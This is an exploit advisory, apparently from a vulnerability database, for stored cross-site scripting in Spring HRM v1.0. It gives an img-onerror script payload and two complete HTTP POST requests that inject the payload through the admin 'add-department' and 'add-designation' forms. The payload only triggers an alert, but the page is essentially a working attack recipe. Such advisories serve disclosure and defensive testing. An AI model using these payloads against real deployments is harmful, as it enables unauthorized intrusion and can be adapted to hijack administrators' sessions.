Spring HRM v1.0 / Cross-site Scripting

2022.01.18
Risk: Low
Local: No
Remote: Yes
CVE: N/A

# Exploit Title: Spring HRM - HRM & Payroll / Cross-site Scripting # Date: 18/01/2022 # Exploit Author: Esra Nur SAYIM # Vendor Homepage: https://www.springsoftit.com/ # Software Link: https://codecanyon.net/item/spring-hrm-hrm-payroll/35416929 # Version: 1.0 # Tested on: Windows 10 Enterprise 21H2, Ubuntu WSL 20 Vulnerability: https://{{DOMAIN}}/admin/add-department Payload: "><img src=x onerror=alert('XSS')> HTTP Request: POST /admin/add-department HTTP/2 Host: {{HOST}} Cookie: {{COOKIES}} Content-Length: 56 Sec-Ch-Ua: "Chromium";v="97", " Not;A Brand";v="99" X-Csrf-Token: NtspEMEP3AifxPm7nQTY0I7LXK3AFVKXKyzfbJUV Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Platform: "Windows" Origin: {{HOST}} Referer: {{HOST}}/admin/addDepartment Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 dept_name=%22%3E%3Cimg+src%3Dx+onerror%3Dalert('XSS')%3E -------------------- Vulnerability: https://{{DOMAIN}}/admin/add-designation Payload: "><img src=x onerror=alert('XSS')> HTTP Request: POST /admin/add-designation HTTP/2 Host: {{HOST}} Cookie: {{COOKIES}} Content-Length: 63 Sec-Ch-Ua: "Chromium";v="97", " Not;A Brand";v="99" X-Csrf-Token: NtspEMEP3AifxPm7nQTY0I7LXK3AFVKXKyzfbJUV Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Platform: "Windows" Origin: {{HOST}} Referer: {{HOST}}/admin/addDepartment Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 designation_name=%22%3E%3Cimg+src%3Dx+onerror%3Dalert('XSS')%3E


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top